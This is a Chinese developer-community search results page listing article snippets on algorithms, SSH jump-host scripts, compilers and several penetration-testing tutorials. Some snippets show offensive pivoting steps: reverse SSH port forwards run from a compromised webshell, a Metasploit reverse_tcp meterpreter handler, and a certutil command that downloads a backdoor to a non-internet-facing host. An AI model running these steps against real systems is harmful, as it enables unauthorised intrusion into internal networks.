首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏mathor

    枚举+优化(6)——双指针优化2

    例3.题目链接:hihoCoder1514  先写一个暴力枚举的伪代码: ans = MAX_INT For i = 1...M { For j = 1...N { 首先我们把3个数组都排序,然后依次枚举A数组中的一个数A[i],表示我们从A数组挑选出的数是A[i]。 test(a[i],b[j + 1],c[k + 1]); } cout << ans; return 0; } 例4.题目链接:hihoCoder1607 思路  一般的暴力枚举这题肯定是过不了的 ,数据量太大,那我们就要想办法优化,能不能只枚举Ai,而将符合条件的Aj数量直接算出来,而不是枚举出来。

    62750发布于 2018-06-19
  • 来自专栏Khan安全团队

    枚举 WordPress 用户的 6 种方法

    search=peter@initech.com 绕过 6.

    5.2K20发布于 2021-10-12
  • 来自专栏C++核心准则原文翻译

    C++核心准则Enum.6:避免无名枚举

    Enum.6: Avoid unnamed enumerations Enum.6:避免无名枚举 Reason(原因) If you can't name an enumeration, the values are not related 如果你无法为枚举命名,说明这些值之间没有关联。 提示无名枚举。 原文链接: https://github.com/isocpp/CppCoreGuidelines/blob/master/CppCoreGuidelines.md#enum6-avoid-unnamed-enumerations

    81510发布于 2020-03-25
  • 云端调用本地或办公室电脑服务或资源的方法

    因此,我们需要借助ssh隧道,将本地服务的端口,映射到ssh跳板机,然后服务端的nginx或其他服务直接代理到跳板机的映射端口。 在yunedit-ssh设置ssh隧道的例子如下,创建一个连接,然后在这个ssh连接中,指定本地端口到ssh版机的端口映射规则即可:上面,创建一个ssh连接,然后在这个ssh连接下,创建一个映射规则, 将本地的8080端口,映射到ssh跳板机的18080端口下。 然后启用这个映射策略:这样,云端的其他服务器访问跳板机的18080端口,就可以访问到本地的8080端口的服务了。云端无需知道本地电脑的实际IP即可访问到本地的服务。

    18410编辑于 2026-02-26
  • RK3562 单板机图形用户界面开发完全手册:Qt Creator 配置与 LVGL 案例详解(二)

    可见黄色箭头已至UpdateLabelStatus函数。按下F10进行调试,请重复按下F10,直到界面显示即停下。然后点击led_control程序按键,可通过状态栏查看信息。 (6)分析调试结果根据调试过程中观察到的信息,分析程序的执行流程和潜在问题,并运行相应的修改和优化。 请将led_control案例bin目录下可执行程序led_control拷贝至单板机系统"/root/"目录。 Target# systemctl enable qtappTarget# reboot单板机重启后,Qt程序将会自启动。 如需取消单板机Qt程序自启动,请执行如下命令。

    26310编辑于 2026-02-27
  • 来自专栏网络安全

    网络安全之跳板攻击

    目录跳板机枚举Proxychains与FoxyProxySSH隧道与端口转发瑞士军刀:Socat现代隧道工具:Chisel"VPNoverSSH":sshuttleDNS隧道其他常用跳板工具概述:什么是跳板攻击 跳板机枚举(EnumeratingfromthePivotHost)在发起进一步攻击前,必须先从已攻陷的跳板机上对内网进行信息收集。 在跳板机上执行:-将第一步生成的**私钥**安全地传输到跳板机上。-执行反向端口转发(`-R`)或反向SOCKS代理(`-R`)命令。 端口转发示例(简单管道):在跳板机上执行,将访问跳板机监听端口的流量转发到内网目标。 6.其他工具FRP:https://github.com/fatedier/frpNPS:https://github.com/ehang-io/npsVenom:https://github.com/

    39211编辑于 2026-02-11
  • 来自专栏Java爬坑系列

    【效率工具】SSH一键登录脚本(可一键从跳板机登录线上服务器)

    说明 前阵子上线,一次性上了十个服务,一直上到凌晨才完事,期间每个服务都要先输入跳板机的登录信息来登录跳板机,然后再输入线上服务器的信息来登录线上服务器,实在是太过于麻烦,而且有些服务还有好几台服务器, 检查问题的时候,服务器跳来去的,简直苦不堪言。 于是,便萌发了用shell脚本的方式来一键跳转的想法,先上github上搜了搜现成的轮子,发现都不太好用,要不就是没说明,要不就是只能登一台服务器,不能满足从跳板机A跳转到线上服务器B的需求。 Shell脚本已经发布到了github上,链接在此:https://github.com/MFrank2016/GotoSSH 这个脚本借鉴了AutoSSH的脚本,并将其进行了修改,使得能够支持从跳板机直接跳转登录服务器 使用说明 GotoSSH是一个一键登录SSH的脚本,可直接从跳板机登录到线上服务器,致力于帮助你提高工作效率。

    2.2K30发布于 2019-05-25
  • 来自专栏安富莱嵌入式技术分享

    AC6. IAR和GCC调试效果,MDK AC6不开优化调试乱,甚至倒序执行

    首先感谢大家对上一个视频的点评回复,非常有意义的讨论,这次AC6的表现更新惊呆,不开优化都可以乱。 【实验目的】 同样的程序代码,目的是测试C环境的调试现象。 【实验版本】 IAR版本 :9.3x MDK版本:5.3x, 含AC5和AC6 Embedded Studio:使用GCC,版本V7.1X 【视频展示】 https://www.bilibili.com MDK AC6不开优化,设置优先级为O0,调试乱,这有点说不过去了。这不能怪优化问题了吧,用的AC6.18。 开成O1优化,甚至还可以倒序执行,动图效果:

    16410编辑于 2025-10-18
  • 来自专栏前端一会

    babel实践:真实gulp项目支持ES6转译ES5的坑指北

    虽然通过相关设计模式的使用,一定程度上减轻了js逻辑处理的复杂度,但看着有更佳实践的ES6语法不能用而只能白流口水,实在是不能忍,尤其是口水已久的ES6中的Promise对象,简直异步最爱,也是我这次优化最想拿下的目标 其中src目录是js源代码目录,本次测试js放在src/js/test1.js文件中,测试涉及ES6语法:let、Promise、Object.assgin()、字符串扩展。 目前对于ES5语法的支持基本都没有问题,但是对于ES6乃至ES7甚至更高版本的JS语法,支持还远没有完善。 另外当转译成ES6模块规范后,还有个需要注意的,在html页面script引用编译后js时,由于已经是使用模块化了,所以在script属性中要加上type="module",这块可以看下ES6的 Module 当然,我是不喜欢这样做的,一般WEB开发也不会需要用到这么极端,推荐babel+babel-polyfill一口气把所有能转译的ES6全支持。

    2.2K20发布于 2019-08-29
  • 来自专栏清风学院

    【效率工具】SSH一键登录脚本(可一键从跳板机登录线上服务器)

    说明 前阵子上线,一次性上了十个服务,一直上到凌晨才完事,期间每个服务都要先输入跳板机的登录信息来登录跳板机,然后再输入线上服务器的信息来登录线上服务器,实在是太过于麻烦,而且有些服务还有好几台服务器, 检查问题的时候,服务器跳来去的,简直苦不堪言。 20190327230716.png] 于是,便萌发了用shell脚本的方式来一键跳转的想法,先上github上搜了搜现成的轮子,发现都不太好用,要不就是没说明,要不就是只能登一台服务器,不能满足从跳板机 Shell脚本已经发布到了github上,链接在此:https://github.com/MFrank2016/GotoSSH 这个脚本借鉴了AutoSSH的脚本,并将其进行了修改,使得能够支持从跳板机直接跳转登录服务器 使用说明 GotoSSH是一个一键登录SSH的脚本,可直接从跳板机登录到线上服务器,致力于帮助你提高工作效率。

    2.1K10发布于 2019-03-27
  • 来自专栏裸机思维

    【反复横】从AC5到AC6转型之路(1)——补救和准备

    有的人说“Arm Compiler 6不如Arm Compiler 5”稳定。 虽然我在实际使用中抓到(报告并得到修复)的Arm Compiler 6 bug的数量超过在座99%的人,但正因如此,我知道要遇到一个Arm Compiler 6的bug有多难——更多时候,其实是我们自己对编译器理解不深刻 在我看来,与其怀疑Arm Compiler 6不稳定,不如怀疑下自己对C语言的理解。 Arm Compiler 6 下直接使用 原来 Arm Compiler 5下所用到的“几乎所有” armlink 相关的特性都可以在 Arm Compiler 6 直接使用(因为基本就是同一个armlink Arm Compiler 5和Arm Compiler 6关闭 Semihosting的方法是不同的: #if __IS_COMPILER_ARM_COMPILER_6__ __asm(".global

    6.7K51编辑于 2022-05-17
  • 来自专栏FreeBuf

    Tunnel:论如何在内网中自由渗透

    第三部:映射跳板机2号的ssh端口,到公网跳板机上(在跳板机1号的webshell中执行) ssh -f -N -R 2222:218.2.135.2:22 oracle@192.168.100.100 第四部:登陆到跳板机2号上 ssh oracle@localhost:2222 因为上一步已经将跳板机2号的22端口映射到公网跳板机上去了,这时候可以直接登陆。 最后一,个人建议以动态映射的方式,这样可以保证后续的其他测试工作也能顺利进行。 但如果甲方对渗透测试有特定的需求,请务必按照甲方要求的方式进行。 (比如,甲方不希望你访问除10.10.10.2之外的任意服务器,那么最后一就做一个本地隐射就可以了) 第六部:在跳板机1号上执行 ssh -f -N -R 7777:218.2.135.2:7777 你发送的流量,在公网跳板机上,跳板机2号上,目标主机上都会进行解密和重新加密的工作,所以效率会低很多(有点类似于洋葱路由了)。

    2.4K101发布于 2018-02-08
  • 来自专栏量子位

    清华大学用6个无线传感器搞定全身动作捕捉,可跑可可打滚

    △惯性动捕 最轻便的也得有5、6斤,价格便宜的就更重了能达到10几斤。穿在身上影响动作的灵活性,而且很快就会累了,基本无法日常使用。 视频中的装备,后面标记出来才看到,两人身上各自只戴了6个小型惯性传感器,还是无线的。 ? 现在市面上的VR设备主要用的是光学动作捕捉。 要知道VR刚出来那会不管有线无线,最大的障碍是要在房间周围摆上3到6个柱子。 ? 后来简化成了头戴设备上的摄像头向外扫描周围的环境实现定位,加上两个手柄上的惯性传感器,如PSVR。

    1.3K50发布于 2021-06-17
  • 来自专栏Java爬坑系列

    【效率工具】史上最好用的SSH一键登录脚本,超强更新!

    说明 虽然已经是凌晨,但丝毫不能掩盖我激动的心情,今天完成了对GotoSSH的一次大更新,新增了两个肥肠实用的功能,我只能说,是真的好用,话不多说,先来看效果图: 普通的一键登录: 一键登录跳板机,然后跳转登录线上服务器 一键登录跳板机查看指定日志: ? 一键登录跳板机后跳转线上服务器查看指定日志: ? 然后是更加劲爆内容,一键从跳板机复制指定文件到本地: ? 一键从生产环境复制指定文件到本地: ? root|testpassword2|22|1 最后一列是代表该服务器依赖于哪个服务器,如果该列的值设置为0,代表不依赖于其他服务器,否则代表需要先登录其他服务器后才能登录该服务器,目前暂时只支持二连, gotossh 1 log gotossh 2 log gotossh 2 cd gotossh 1 scp log3 gotossh 2 scp log4 解决了什么问题 查询线上服务器日志的时候,需要先登录跳板机

    1.9K50发布于 2019-05-25
  • 来自专栏HACK学习

    Linux内网渗透

    第三部:映射跳板机2号的ssh端口,到公网跳板机上(在跳板机1号的webshell中执行) ssh -f -N -R 2222:218.2.135.2:22 oracle@192.168.100.100 第四部:登陆到跳板机2号上 ssh oracle@localhost:2222 因为上一步已经将跳板机2号的22端口映射到公网跳板机上去了,这时候可以直接登陆。 最后一,个人建议以动态映射的方式,这样可以保证后续的其他测试工作也能顺利进行。但如果甲方对渗透测试有特定的需求,请务必按照甲方要求的方式进行。 (比如,甲方不希望你访问除10.10.10.2之外的任意服务器,那么最后一就做一个本地隐射就可以了) 第六部:在跳板机1号上执行 ssh -f -N -R 7777:218.2.135.2:7777 说明:以上2条路由的意思,是攻击机如果要去访问17或者16网段的资源,其下一是session12,至于什么是下一条这里不多说了,反正就是目前攻击机可以访问内网资源了。

    7.6K40发布于 2019-08-07
  • 来自专栏裸机思维

    【反复横】从AC5到AC6的转型之路(2)——“两面包夹芝士”的堆栈模型

    值得说明的是,这一方法对Arm Compiler 5(armcc)和Arm Compiler 6(armclang)同样适用。支持MicroLib和非MicroLib的情况。 随着Arm Compiler 6的逐步普及,更多的芯片公司正在追随Arm的脚步将原本的汇编启动文件替换为 CMSIS 目录下所提倡的纯C语言启动文件。 作为【反复横】系列的一部分,我希望通过这篇文章能帮助大家扫清从Arm Compiler 5向Arm Compiler 6过渡图中与栈相关的障碍。希望对你有所帮助。

    1.8K30编辑于 2022-12-20
  • 来自专栏【腾讯云开发者】

    微信程序员推荐的后台开发环境和常用小工具

    "brightCyan": "#29B8DB", "brightGreen": "#23D18B", "brightPurple": "#D670D6" 连接跳板机的配置里面ControlMaster和ControlPath会让ssh共享链接,下次连接不用输pin+token,我是开了一个screen,连接之后就放到后台,就可以关闭tab了,后面有需要再连接跳板机 在本地wsl里面alias dgo和qlst,就可以忽略跳板机存在了。 一些好用的小工具 protobuf-language-server https://github.com/lasorda/protobuf-language-server proto文件跳转,cpp直接proto 定义位置(自动生成的pb.h下载到了本地,先跳.h,.h再proto),有代码格式化和补全。

    38921编辑于 2025-07-31
  • 来自专栏醉梦轩

    一款让跨网络访问变简单的工具——turbo-tunnel

    0x00 前言 你是否遇到过以下这些情况: 目标服务需要通过跳板机才能访问,每次都要将端口映射到本地,然后配置hosts访问 不同的服务需要配置不同的代理才能访问,管理起来很不方便 有些服务需要通过嵌套代理才能访问 SSH隧道 SSH隧道是一种常见的跨网络访问方式,一般以跳板机的形式提供。用户通过端口映射的方式访问目标网络区域里的服务。 0x02 嵌套访问 嵌套访问是一种很常见的使用场景,例如:在公司内需要先通过HTTPS访问外网,然后再通过公网的一台SSH跳板机来访问真正的目标服务,甚至有可能还要多次穿越SSH隧道。 支持嵌套访问的原理是:建立每一层的代理连接后,都会告诉它下一代理的地址,这样会建立一个请求链,最终将请求发送到真正的目标服务。

    2.6K10发布于 2021-03-03
  • 来自专栏信息学

    NOIP训练营内部试题-数数(树形DP+倍增)

    sons[1]; nxt[0] = 1; dfs_ans(1); printf("%I64d\n", ans); } 解析: 树形DP+倍增 回想倍增法求LCA的过程 从大到小枚举 k,每次2^k步,只要不越界就,最后一定能跳到LCA 因为的都是2的幂次步,所以每一步就是二进制加了一个1 先预处理fa[i][k],表示点i向上2^k 步的祖先节点 设 f[i][j] 表示最后一步跳了 [i]=j 表示 当前点属于 i的子树里,以j为根节点的子树 假设dfs回溯到x,转移分两种: 1、以x为链的一个端点 枚举x向上2^k次,则v=fa[x][j] 那么ans+=siz[v]-siz 2^i 跳到了x 枚举x再往上2^j步,则v=fa[x][j] 那么ans+=(f[x][i]+cnt[x][i])*(siz[v]-siz[rt[v]]) f[x][i] 是原来的答案,在以v做LCA ^1累积到2里,然后在枚举2为中途点时,最后一步跳了2^1到2,2再往上2^0) 为什么在枚举3作为中途点的时候,不枚举跳了2^0次方到了3 因为此时3不是中途点,我们是按2^k,k是降序的 个人总结

    38520发布于 2019-05-28
  • 来自专栏信安之路

    利用 TCP 隧道让内网不出网主机上线 MSF

    在获得一台内网跳板机权限之后,想让相同内网其他主机上线 MSF,由于只有跳板机可以出网,如何能让其他不出网主机通过跳板机上线 MSF 呢? IP,端口填 1080,然后使用 msf 监听端口 4444: msf6 > use exploit/multi/handler [*] Using configured payload generic /shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > run -j 接下来将生成好的后门 ,上传至不出网主机,跳板机是个 web 服务器,将后门文件先上传至跳板机,然后在不出网主机上执行命令,从跳板机下载后门执行: certutil.exe -urlcache -split -f http:

    2.5K10编辑于 2022-04-07
领券